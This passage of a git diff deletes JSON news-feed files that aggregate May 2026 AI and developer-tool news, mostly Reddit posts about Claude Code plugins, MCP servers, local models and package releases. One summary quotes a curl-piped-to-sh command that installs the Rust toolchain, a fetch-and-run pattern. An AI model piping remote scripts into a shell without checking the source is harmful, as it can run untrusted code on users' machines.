"https://huggingface.co/blog/tegridydev/open-source-ai-agents-directory", - "source": "Hugging Face Blog", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-03T18:00:42.827Z", - "summary": null, - "category": "ai_models" - }, - { - "title": "Built this over the weekend because dataset prep was annoying af", - "url": "https://reddit.com/r/StableDiffusion/comments/1t2sb82/built_this_over_the_weekend_because_dataset_prep/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-03T17:50:27.000Z", - "summary": "I’ve been working on my startup and had to train diffusion models for animations. Realized the worst part is not training, it’s the dataset prep. Especially with stuff like LTX models where things have to follow specific rules like frame counts (8n+1) and resolution constraints. You take random clips and almost nothing fits directly, so you end up trimming, resizing, fixing frames, adding captions… just a lot of repetitive work. So I built a tool for myself over the weekend to deal with it. It’s fully open source. Runs local-first with a simple UI + FastAPI backend, uses FFmpeg underneath. You basically drop your raw videos and it just handles all that stuff. Checks what’s wrong, fixes it, lets you tweak things if needed, and gives you a clean dataset ready for training. Also gives you a good level of control across the whole pipeline, so you’re not locked into rigid preprocessing. It also has bulk captioning feature across the dataset. Currently it supports LTX and WAN, and I’ll be adding support for more models soon. Been using it myself and it made things way smoother, so putting it out. Also I keep building similar small open source tools like this and putting them out. You’ll…", - "category": "creative_tools" - }, - { - "title": "I made an easy to use OPEN SOURCE, beautiful UI wrapper for ComfyUI without the node graph", - "url": "https://reddit.com/r/StableDiffusion/comments/1t2s1yp/i_made_an_easy_to_use_open_source_beautiful_ui/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-03T17:40:48.000Z", - "summary": "soo I got into local ai image generation and saw that there was no truly simple generators that just had beautiful views for generating images, no complex stuff, so I decided to make my own and open source it of course on github the backend is fully comfyUI, but it has no node graphs, it just uses it because I love the backend and it works much easier then anything else for this I would love to have people review and contribute/find issues for this, heres some images of it but basically its called J AI Studio, and ive stripped it back to be as simple yet still great as possible, for anyone new to ai image gen OR just people who want less clutter/ugly UI's heres the github and some pics of it [https://github.com/jasperdevs/J-AI-Studio](https://github.com/jasperdevs/J-AI-Studio) [Main view](https://preview.redd.it/t786wcnikyyg1.png?width=1657&format=png&auto=webp&s=1900054e0ff13b094050769f15ab441ad0a13243) [\\\\\"Zen Mode\\\\\"](https://preview.redd.it/550ak82jkyyg1.png?width=1660&format=png&auto=webp&s=bdca9741ce07aecb6f6c6a179be0e4a0f4116b24) [Fullscreen on an image](https://preview.redd.it/p4spphgkkyyg1.png?width=1328&format=png&auto=webp&s=18f2c3442…", - "category": "creative_tools" - }, - { - "title": "Can I ask a noob question?", - "url": "https://reddit.com/r/StableDiffusion/comments/1t2rilm/can_i_ask_a_noob_question/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-03T17:21:05.000Z", - "summary": "Hello all, I am extremely new to this AI video generation realm. Till now I was just generating images with Gemini (nano banana). While looking for video generations I saw higgsfield and eleven labs, but I can't pay for the steep prices. While looking for open source options, I found this sub. I have seen mentions of LTX and Wan for video generations. Does this sub has a beginner guide or something? If not can anyone guide me onto making good AI videos for instagram? Thank you.", - "category": "creative_tools" - }, - { - "title": "Built a local LLM inference engine on CachyOS — runs faster than llama.cpp on my 9070 XT", - "url": "https://reddit.com/r/StableDiffusion/comments/1t2nm4u/built_a_local_llm_inference_engine_on_cachyos/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-05-03T14:54:30.000Z", - "summary": "Hey folks, we've been hacking on a Vulkan-based LLM engine the last few weeks, figured I'd share since I'm running it exclusively on CachyOS with Mesa RADV. It's called VulkanForge — single 14 MB Rust binary, no Python, no ROCm, just pure Vulkan compute shaders. Runs GGUF models (Q4\\_K\\_M etc.) and also native FP8 SafeTensors which llama.cpp can't even load. Some numbers on my RX 9070 XT (RADV Mesa 26.0.6): * Qwen3-8B Q4\\_K\\_M: 134 tok/s decode (llama.cpp does \\~129) * Mistral-7B: 132 tok/s (llama.cpp \\~124) * Native FP8 Llama-3.1-8B: 68 tok/s in 7.5 GB VRAM Everything works out of the box on CachyOS — just `cargo build --release` and go. No weird driver hacks needed, fish shell works fine too lol. GitHub: [https://github.com/maeddesg/vulkanforge](https://github.com/maeddesg/vulkanforge) Happy to answer questions if anyone wants to try it on their RDNA4 setup.", - "category": "creative_tools" - }, - { - "title": "Side-by-side comparison of Qwen-Image, ERNIE Base/Turbo, and FLUX.2 Dev across 8 custom styles (single RTX 5090)", - "url": "https://reddit.com/r/StableDiffusion/comments/1t2nkkt/sidebyside_comparison_of_qwenimage_ernie/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-03T14:52:46.000Z", - "summary": "Hey folks. I've been playing around at home picking which open-source image model to settle on for some prototyping work, and ended up doing a fun little side-by-side that maybe someone else will find useful. Same prompt and same seed across four models, with eight different style presets (AI generated). Completely amateur — no benchmarking rigor, just curiosity and a free weekend. # Tested models * **Qwen-Image-2512** (BF16) with **Qwen2.5-VL-7B** NVFP4 scaled text encoder * **ERNIE-Image Base** (BF16) with **Ministral 3 3B** text encoder * **ERNIE-Image Turbo** (BF16, 8-step DMD-distilled) with **Ministral 3 3B** text encoder * **FLUX.2 Dev** (NVFP4 mixed) with **Mistral 3 Small** (flux2 type, FP4 mixed) text encoder # Hardware * **GPU**: NVIDIA RTX 5090 (32 GB VRAM) * **CPU**: AMD Ryzen 9 9950X3D * **RAM**: 64 GB DDR5 # Notes Settings are whatever I found ideal for my hardware after a fair bit of trial and error — these are not necessarily community defaults, just what worked best on my machine. * **Qwen-Image** and **FLUX.2 Dev NVFP4** both spill heavily into system RAM during inference. They fill almost the entire VRAM and most of the system RAM at once. * **Qwen-Image-2512**…", - "category": "creative_tools" - }, - { - "title": "@Scobleizer Shares Full Resume of AI Industry Work in Response to Being Challenged", - "url": "https://x.com/Scobleizer/status/2050740859789103142", - "source": "Aligned News (Scoble)", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-05-03T14:52:14.377Z", - "summary": "Scoble summarized his AI industry credentials: most complete X lists, alignednews.com news service, entrepreneur interviews, multiple company launches, and eight books about the future. The response provides a concise overview of his information infrastructure and editorial brand.", - "category": "ai_tools" - }, - { - "title": "What if ChatGPT launched in 1998", - "url": "https://reddit.com/r/ChatGPT/comments/1t2l80n/what_if_chatgpt_launched_in_1998/", - "source": "Reddit r/ChatGPT", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-05-03T13:16:47.000Z", - "summary": "Saw the Wikipedia premium screenshot and it got me thinking… Enjoy ✌️", - "category": "ai_tools" - }, - { - "title": "Set up multi-agent orchestration with Claude Code as the boss... am I overcomplicating this?", - "url": "https://reddit.com/r/ClaudeAI/comments/1t2i664/set_up_multiagent_orchestration_with_claude_code/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-05-03T10:49:45.000Z", - "summary": "Pretty new to AI but been deep on a side project for a while now. Got tired of one Claude session running out of context halfway through anything serious, so I rigged up an orchestration thing. Working well enough but I have no idea if I'm just reinventing the wheel. Setup looks like this: ( Please note it's work paying for all these , I wouldn't be spending my own money having this many agents etc ) **Main orchestrator**: Claude Code running Opus 4.7 (1M context, high effort) Premium team seat. This one talks to me, plans the work, reviews everything that comes back, decides what to fan out. Anything sensitive (auth, payments, db migrations, anything where conversation history matters) it does itself. **Subagents :** all called from bash via wrapper scripts in ./agents/: * **claude-sub** : another Claude Code (Opus 4.7 High) premium team seat on a worker account so my main quota isn't drained. Fresh context. Used for \"review your own diff with fresh eyes\" or well-specified subtasks. * **codex:** GPT-5.5 via Codex CLI. Team plan . Mostly the per-task reviewer with mocks attached via --image. * **codex-sub:** GPT-5.5 via Codex CLI. Team plan. Because with work I have the two accoun…", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-04.json b/data/news-feed-2026-05-04.json deleted file mode 100644 index d34c400..0000000 --- a/data/news-feed-2026-05-04.json +++ /dev/null @@ -1,263 +0,0 @@ -{ - "generated": "2026-06-05T00:44:37.711Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-04", - "article_count": 15, - "archived_story_count": 617, - "articles": [ - { - "title": "Local MCP server that tells Claude Code what would break before it edits a file (raysense, MIT, free)", - "url": "https://reddit.com/r/ClaudeAI/comments/1t3jhnz/local_mcp_server_that_tells_claude_code_what/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "api_update", - "mcp", - "developer_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-04T14:33:50.000Z", - "summary": "A pattern I keep hitting in Claude Code: I ask the agent to refactor something modest -- a parsing utility, a helper, a config loader -- and the diff it produces looks fine. Tests in the file pass. I run CI and three unrelated tests blow up. Sometimes the broken caller is code I have not touched in months. The agent is not careless. It read the file. What it could not do was *see the codebase*: the dependency graph, the call sites, the modules that lean on each other, the cycles, the test coverage of each piece. Plain text never reveals this. You cannot grep your way to \"what would break if I delete this function.\" We built **raysense** to close that gap. It is a single Rust binary + Claude Code plugin + stdio MCP server that gives Claude structural memory of your codebase. **Free, MIT-licensed, local-only -- no SaaS, no API key, no telemetry.** It ships from crates.io and builds from source on first install, so the only prerequisite is a Rust toolchain (`cargo`) on the machine. If you don't have it yet: ``` curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh ``` After that, `cargo install raysense` is the whole installation. (Disclosure: I am part of the team behind it…", - "category": "ai_tools" - }, - { - "title": "claudely: launch Claude Code against Local LLM provider like LM Studio / Ollama / llama.cpp without trashing your real claude config", - "url": "https://reddit.com/r/ClaudeAI/comments/1t38e7c/claudely_launch_claude_code_against_local_llm/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "mcp", - "developer_tool", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-04T05:19:34.000Z", - "summary": "Plenty of CLI coding agents will talk to a local LLM, but the catch is the ecosystem. Skills, slash commands, MCP servers, plugins, hooks: all the interesting tooling has been built specifically for Claude Code, and parity on every other agent is patchy at best. Trying to reuse a Claude-shaped workflow on a different agent quickly turns into \"rewrite all the plugins\" or \"do without.\" claudely skips that fight. You keep Claude Code as the client (and its whole plugin / skill / MCP ecosystem with it), and just point it at a model running on your own hardware. Pick a provider, claudely spawns \\`claude\\` with the right base URL, auth, and cache fix wired up for that one session. Your shell and the regular \\`claude\\` command stay untouched, so you can flip between local and the real Anthropic API without thinking about it. It also quietly fixes a prompt-cache bug that otherwise tanks local-model speed by \\~90%, and handles the per-provider env-var differences for you. Works with LM Studio, Ollama, llama.cpp, or any Anthropic-compatible endpoint (point it at a litellm or claude-code-router proxy for OpenAI-protocol backends like vLLM). npm i -g claudely claudely # LM Studio, picker over…", - "category": "ai_tools" - }, - { - "title": "Releasing the Data Analyst Augmentation Framework (DAAF) version 2.1.0 today -- still fully free and open source! In my very biased opinion: DAAF is now finally the best, safest, AND easiest way to get started using Claude Code for respons…", - "url": "https://reddit.com/r/ClaudeAI/comments/1t3ryo1/releasing_the_data_analyst_augmentation_framework/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "open_source", - "developer_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-04T19:28:17.000Z", - "summary": "https://preview.redd.it/o74lppqd86zg1.png?width=1456&format=png&auto=webp&s=3a904bae42b8130e2c6382be55debe8f6ef4d6ca When I launched the Data Analyst Augmentation Framework [v2.0.0 six weeks ago](https://daafguide.substack.com/p/daaf-v200-is-finally-here-from-usable), I wrote that the major update was about going “from usable to useful” -- rebuilding the orchestrator system for maximum flexibility and efficiency, adding a variety of more responsive engagement modes, and deepening the roster of methodological knowledge that DAAF could pull upon as needed for causal inference, geospatial analysis, science communication and data visualization, supervised and unsupervised machine learning, and much, much more. But while DAAF continued to get more capable and more useful for those actually using it… Well, it was still extremely annoying to use, generally obtuse, and hard to get started with, which means a lot of people who were interested were simply bouncing off of it. **That all changes with the v2.1.0 update**, which I’m cheekily calling the Frictionless Update for three key reasons: # 1. Installation happens in one line now From a fresh computer to talking with a DAAF-e…", - "category": "ai_tools" - }, - { - "title": "Top 6 Claude Skills: 15th April to 3rd May", - "url": "https://reddit.com/r/ClaudeAI/comments/1t3qmqy/top_6_claude_skills_15th_april_to_3rd_may/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-04T18:42:21.000Z", - "summary": "Found some Open Source Claude skills from last 15 days. Some of them are pretty decent to use, personally liked the npm downloads one. Check out: **- brand-alchemy:** A brand strategy and naming skill that interrogates your thoughts for branding first, then applies phonosemantics, category design frameworks, and auto-checks domain availability across any TLD. **- npm-downloads-to-leads:** Give it a list of npm packages. It pulls 12 weeks of download data, scores each one by growth velocity, maps maintainers to GitHub and X, and gives you a ranked lead brief who built it, how to reach them, and what to say. **- hyperframes:** Write HTML, render video. Built for agents. Handles HTML-to-video rendering with ffmpeg, GSAP animations, and puppeteer automation great for auto-generating video content from code. **- email-newsletter:** Draft and design a complete HTML email newsletter from a topic or content brief. Paste-ready output for Loops, Mailchimp, Beehiiv, Resend, and most email platforms. **- pricing:** Help figure out pricing for a product or service using minimalist entrepreneur principles. Comes straight from the book 'The minimalist Entrepreneur\" playbook cost-based, value-bas…", - "category": "ai_tools" - }, - { - "title": "built a plugin so my parallel Claude Code sessions can message each other instead of me alt-tabbing", - "url": "https://reddit.com/r/ClaudeAI/comments/1t3osat/built_a_plugin_so_my_parallel_claude_code/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "developer_tool" - ], - "matching_tags": [ - "mcp", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-04T17:38:22.000Z", - "summary": "I usually have two or more Claude Code sessions open at once. One in the backend repo, one in the frontend. Half the time I'd be in the frontend asking \"wait, what shape did the user object end up as?\", then alt-tab, ask the backend session, copy the answer, alt-tab back, paste. The other Claude was right there. It already knew. I was the bottleneck. So I wrote a plugin called Relay. In the frontend window I just say: ▎ask the backend session what the user object looks like The backend session sees the question between turns, answers it, and the reply pops up in my frontend session as a notification. No window switching. No copy-paste. Works for broadcasts too, like \"ask everyone what they're working on\", and the replies trickle in one at a time. The mechanism is simpler than it sounds. Claude Code shipped a channels capability a while back that lets MCP servers push messages into a session between turns. Relay piggybacks on that. Each session runs a tiny MCP server, a single hub daemon on your machine routes between them over a unix socket, and inbound asks land as channel notifications so Claude reacts to them naturally on its next turn. First session you start spawns the hub. I…", - "category": "ai_tools" - }, - { - "title": "Your Claude Code agent is always working from stale context. I built it a fix it can rewind, replay, and stay ahead of every edit.", - "url": "https://reddit.com/r/ClaudeAI/comments/1t3du61/your_claude_code_agent_is_always_working_from/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "agent_tool" - ], - "importance": 0.99, - "date": "2026-05-04T10:33:23.000Z", - "summary": "Every long Claude Code session has the same hidden failure mode: the agent is always working from stale context. It re-reads the same 12 files across three sessions to \"remind itself\" of an interface you already showed it. It refactors getUserById without checking who calls it. It edits a config with no memory of why the previous version was that way. It's not the context window. The window is fine. There's no persistent, time-aware representation of your codebase for the agent to re-query. So it guesses. And you pay tokens for every re-read. I built Memtrace to fix exactly this. Two things it does that no other memory tool does: **(1) Always-fresh state.** Every edit you make triggers a 42ms incremental snapshot of the changes applied by the coding agent. The agent's memory is never one-session-old. After a refactor it knows the blast radius before you do: every caller, every test, every consumer of the function you just touched. Your agent stops asking \"what does getUserById return?\" 30 seconds after seeing it. **(2) Rewind and replay.** This is the part nobody else has. Your codebase is stored bi-temporally so every change becomes a recallable episode. When the agent debugs a r…", - "category": "ai_tools" - }, - { - "title": "ChatGPT’s fixation on my past conversations has made it borderline unusable", - "url": "https://reddit.com/r/ChatGPT/comments/1t35tbg/chatgpts_fixation_on_my_past_conversations_has/", - "source": "Reddit r/ChatGPT", - "tags": [ - "github_release", - "tool_update" - ], - "matching_tags": [ - "github_release", - "tool_update" - ], - "importance": 0.96, - "date": "2026-05-04T03:07:30.000Z", - "summary": "in the past, I feel like I could count on coming to ChatGPT and, generally speaking, get the “best“ answer when I asked a question or wanted to explore an idea. for some time now, this is no longer the case. At some point, chat became so obsessed with everything it knows about me that it seems to be no longer capable of providing the best answer. it just provides answers that relate to things I’ve mentioned in the past, answers that include interests I’ve told it about, answers that continue/build on previous ideas that I’ve explored, etc. overly simplified example: going to chat and asking for the best album or book of 2026, and getting an answer that is entirely based on the literary or musical interests that I’ve told it about in the past. sometimes (most times???) I just want answers “in a vacuum” - I don’t want my biases or my interests informing the response. it’s become a serious problem when you’re trying to explore creative ideas or use the tool to think about something in a novel way, and it’s just digging for things that it can say that relate to your past conversations at all costs instead. its like a new version of the “people pleasing“ that we were all griping about…", - "category": "ai_tools" - }, - { - "title": "Turbo v2.9.9 released", - "url": "https://github.com/vercel/turborepo/releases/tag/v2.9.9", - "source": "GitHub Releases · Turbo", - "tags": [ - "github_release", - "tool_update" - ], - "matching_tags": [ - "github_release", - "tool_update" - ], - "importance": 0.9199999999999999, - "date": "2026-05-04T20:55:20.000Z", - "summary": "\n\n## What's Changed\n### Changelog\n* release(turborepo): 2.9.8 by @github-actions[bot] in https://github.com/vercel/turborepo/pull/12700\n* fix: Remove Unix parent death watchdogs by @anthonyshew in https://github.com/vercel/turborepo/pull/12699\n* release(turborepo): 2.9.9-canary.1 by @github-actions[bot] in https://github.com/vercel/turborepo/pull/12705\n* fix: Scope repo index prefixes to Git root by @anthonyshew", - "category": "ai_tools" - }, - { - "title": "pnpm v11.0.5 released", - "url": "https://github.com/pnpm/pnpm/releases/tag/v11.0.5", - "source": "GitHub Releases · pnpm", - "tags": [ - "github_release", - "cli_tool" - ], - "matching_tags": [ - "github_release", - "cli_tool" - ], - "importance": 0.9199999999999999, - "date": "2026-05-04T20:22:16.000Z", - "summary": "## Patch Changes\r\n\r\n* Drop the `darwin-x64` artifact from `@pnpm/exe` and from the GitHub release page. The Node.js SEA mechanism `pnpm pack-app` uses produces a binary that segfaults at startup on Intel Macs because of an upstream Node.js bug ([nodejs/node#62893](https://github.com/nodejs/node/issues/62893), tracked alongside [#59553](https://github.com/nodejs/node/issues/59553); the Node.js team has [opted not to fix it](https://github.com/nodejs/node/pull/60250) on the grounds that x64 macOS ", - "category": "ai_tools" - }, - { - "title": "A new open weights image model appears in ArtificialAnalysis. Outperforming Flux.2 Pro and Z Image Turbo.", - "url": "https://reddit.com/r/StableDiffusion/comments/1t3rd6m/a_new_open_weights_image_model_appears_in/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-04T19:07:33.000Z", - "summary": "A new open weights image model appears in ArtificialAnalysis. Outperforming Flux.2 Pro and Z Image Turbo.", - "category": "creative_tools" - }, - { - "title": "Machines Are Getting Onchain Passports and Credit Ratings Now — peaqOS Is Live", - "url": "https://x.com/peaq/status/2051288009081782473", - "source": "Aligned News (Scoble)", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-05-04T14:56:47.726Z", - "summary": "peaq launched peaqOS, giving physical machines verifiable digital identities, passports, and credit ratings recorded on-chain. The company also welcomed its first non-human team member. The machine economy is not a future concept anymore.", - "category": "ai_tools" - }, - { - "title": "AI Invented a Math Framework. Humans Used It to Solve Two 60-Year-Old Conjectures", - "url": "https://x.com/WesRoth/status/2051300819878936591", - "source": "Aligned News (Scoble)", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-05-04T14:56:47.725Z", - "summary": "An AI-generated mathematical framework originally used to solve Erdős Problem 1196 has now been generalized to prove a second 60-year-old conjecture. The model did not assist the discovery. It was the discovery.", - "category": "ai_tools" - }, - { - "title": "Cursor Team Kit Just Released — The Internal Skills the Cursor Team Uses to Build Cursor", - "url": "https://x.com/ericzakariasson/status/2051255780167610522", - "source": "Aligned News (Scoble)", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-05-04T14:56:47.725Z", - "summary": "The Cursor engineering team open-sourced Cursor Team Kit, containing the internal slash commands they use to build the Cursor editor at Cursor. It includes verify-this, fix-merge-conflicts, pr-review-canvas, and cli-automation-harness.", - "category": "ai_tools" - }, - { - "title": "Ace-Step-1.5-Api-server-UI", - "url": "https://reddit.com/r/StableDiffusion/comments/1t39bjl/acestep15apiserverui/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-05-04T06:10:23.000Z", - "summary": "[Ace-Step-1.5-Api-server-UI](https://github.com/tritant/Ace-Step-1.5-Api-server-UI) # Features [](https://github.com/tritant/Ace-Step-1.5-Api-server-UI#features) * **Compose** — Text-to-music generation with full parameter control * **Cover** — Style transfer from a reference audio * **Repaint** — Selective region editing with WaveSurfer timeline * **Base ★** — Exclusive Base model modes: * 🧱 **Lego** — Add a specific instrument track to an existing mix * 🔬 **Extract** — Isolate a stem from a mix * 🎹 **Complete** — Generate accompaniment for an existing track * Multi-track timeline with per-track solo/mute/volume * Persistent configuration via localStorage * Batch generation support * Multi lora support", - "category": "creative_tools" - }, - { - "title": "Meta Abandons Open Source — Days After LlamaCon", - "url": "https://x.com/thenewstack/status/2050017453615301067", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-03T23:53:43.957Z", - "summary": "Meta abandoned open-source Llama for proprietary Muse Spark just days after LlamaCon celebrated one billion downloads, a dramatic reversal with major implications for the AI developer community.", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-05.json b/data/news-feed-2026-05-05.json deleted file mode 100644 index 2ac0f3f..0000000 --- a/data/news-feed-2026-05-05.json +++ /dev/null @@ -1,269 +0,0 @@ -{ - "generated": "2026-06-05T00:44:37.852Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-05", - "article_count": 15, - "archived_story_count": 540, - "articles": [ - { - "title": "torch-nvenc-compress: GPU NVENC silicon as a PCIe bandwidth multiplier — PCA + pure-ctypes Video Codec SDK wrapper. Parallel-path overlap measured at 67% of theoretical max on a real GEMM + encode workload. [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1t2zy4h/torchnvenccompress_gpu_nvenc_silicon_as_a_pcie/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "open_source", - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "api_update", - "open_source", - "developer_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-03T22:43:17.000Z", - "summary": "I've been working on the consumer-multi-GPU PCIe bottleneck — Nvidia removed NVLink from the 4090/5090, and splitting a 70B model across two consumer cards drops you to \\~30 GB/s over PCIe peer-to-peer. Spent the last few months building a Python library that uses the GPU's otherwise-idle NVENC/NVDEC silicon to compress activations and KV cache on the fly, then ships the small bitstream across the same wire. **Repo:** [https://github.com/shootthesound/torch-nvenc-compress](https://github.com/shootthesound/torch-nvenc-compress) (Apache 2.0) # Prior art (this isn't novel as an idea) * **LLM.265 — \"Video Codecs are Secretly Tensor Codecs\"** (late 2025). The closest direct precedent: same insight applied to LLM weights, activations, KV cache. * **KVFetcher** (April 2026). KV compression for remote prefix fetching. * **CodecFlow** (April 2026). Codec motion-vector metadata for KV refresh during prefill. The \"video codec on tensors\" idea was already in the literature when I started. What's added in this work: 1. **PCA + rank-truncation as preprocessing.** Activations and KV in their standard basis are noise-like (\\~4× compression floor, basically the Gaussian-noise limit). The PCA basis…", - "category": "ai_research" - }, - { - "title": "Released a TurboQuant-compatible KV backend evaluation SDK", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t4ls7i/released_a_turboquantcompatible_kv_backend/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "api_update", - "developer_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-05T17:12:04.000Z", - "summary": "Disclosure: I am the author of this evaluation SDK. I released an independent TurboQuant-compatible KV backend evaluation package for compressed-KV ABI testing, smoke tests, and partial attention decode experiments. The goal is narrow: test whether compressed KV-cache workloads can be routed through a clean low-level backend ABI for: \\- compressed KV block registration \\- KV dot / QK partial execution \\- block-local attention partial decode \\- capability probing \\- fallback and correctness reporting \\- minimal benchmark validation Repository: [https://github.com/ixu2486/tq\\_compat\\_eval](https://github.com/ixu2486/tq_compat_eval) This is not a Google project, not an official TurboQuant implementation, and not a replacement for TurboQuant, llama.cpp, or existing model runtimes. It is also not the full RetryIX runtime. The private runtime, scheduling policy, hardware-interface contracts, and internal routing logic are not included. I would appreciate feedback from people working on KV-cache optimization, quantized inference, compressed-KV formats, long-context decoding, or backend integration.", - "category": "ai_models" - }, - { - "title": "Node.js v26.0.0 released (MAJOR UPDATE)", - "url": "https://github.com/nodejs/node/releases/tag/v26.0.0", - "source": "GitHub Releases · Node.js", - "tags": [ - "api_update", - "github_release", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "github_release", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-05T14:21:26.000Z", - "summary": "\n\n\nWe're excited to announce the release of Node.js 26! Highlights include the Temporal API enabled by default,\nupdates to the V8 JavaScript engine to 14.6, Undici to 8.0, and several important deprecations and removals\nas we continue to modernize the platform.\n\nAs a reminder, Node.js 26 will enter long-term support (LTS) in October, but until then, it will be the \"Current\" release for the next six months.\nWe encourage you to explore the new features and benefits offered by this latest release a", - "category": "ai_tools" - }, - { - "title": "Anthropic ships Claude for Creative Work with nine MCP-native connectors", - "url": "https://reddit.com/r/ClaudeAI/comments/1t48vtx/anthropic_ships_claude_for_creative_work_with/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "mcp", - "developer_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-05T08:00:42.000Z", - "summary": "Anthropic announced Claude for Creative Work on April 28. The release includes nine official connectors that plug Claude into professional creative software, with a native Blender connector as the flagship. All nine are built on the Model Context Protocol (MCP), so Claude can read live project state and execute actions directly inside each app rather than operating through copy-paste workflows. The MCP piece is what makes this more than a plugin announcement. This is one of the first production-scale deployments where an LLM maintains persistent context within a host application's own data model. If the pattern holds up, it probably becomes the template for how agents integrate with domain-specific software more broadly. What creative tools would benefit most from this kind of native agent integration? I'd guess video editing is high on the list, but curious what others think. Announcement: [https://www.anthropic.com/news/claude-for-creative-work](https://www.anthropic.com/news/claude-for-creative-work)", - "category": "ai_tools" - }, - { - "title": "Offload routine Claude Code work to Gemma 4 through the Google GenAI API", - "url": "https://reddit.com/r/ClaudeAI/comments/1t4sj9u/offload_routine_claude_code_work_to_gemma_4/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 1, - "date": "2026-05-05T21:08:53.000Z", - "summary": "The idea of offload-mcp is simple: instead of running hardware-hungry local models for routine work, let Claude offload that work to FREE model APIs and SAVE tokens. I’m using Gemma via the Google GenAI API because I like it in my processing pipelines, but running it locally on my MacBook Air is slow and resource-limited. The API path is much more practical for small jobs. I didn't find any other tool on GitHub or elsewhere to handle that. offload-mcp takes care of commit messages, PR summaries, translations, docstrings, source diff/file summaries, and freeform prompts. Freeform is what I use most: send almost any routine prompt to a cheaper model instead of burning expensive Claude Code or Codex context on it. The source-based mode can read local diffs/files directly through the MCP server and reports estimated primary input tokens avoided. The default model chain uses Gemma, but model IDs are configurable. Curious if this fits anyone else’s Claude workflow! GitHub: [https://github.com/peterhadorn/offload-mcp](https://github.com/peterhadorn/offload-mcp)", - "category": "ai_tools" - }, - { - "title": "Anomaly Detection Belongs in Your Database — built SIMD-accelerated isolation forests into Stratum's SQL engine [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1t4riem/anomaly_detection_belongs_in_your_database_built/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-05-05T20:31:23.000Z", - "summary": "We added native anomaly detection in Stratum, our columnar analytics engine for the JVM. Train and score isolation forest models entirely from SQL — no Python, no export pipeline: SELECT * FROM transactions WHERE ANOMALY_SCORE('fraud_model') > 0.7; 6 microseconds per transaction, SIMD-accelerated, runs inside the query engine. The full write-up covers why we built it, how isolation forests work, and benchmarks against PyOD/scikit-learn: [https://datahike.io/notes/anomaly-detection-in-your-database/](https://datahike.io/notes/anomaly-detection-in-your-database/) Stratum is open source (Apache 2.0): [https://github.com/replikativ/stratum](https://github.com/replikativ/stratum) Happy to answer questions about the implementation — the isolation forest is pure Java with Vector API SIMD, scoring is fused into the query execution pipeline so it benefits from zone map pruning and chunked streaming.", - "category": "ai_research" - }, - { - "title": "Gemini has a big outage going on but refuses to acknowledge 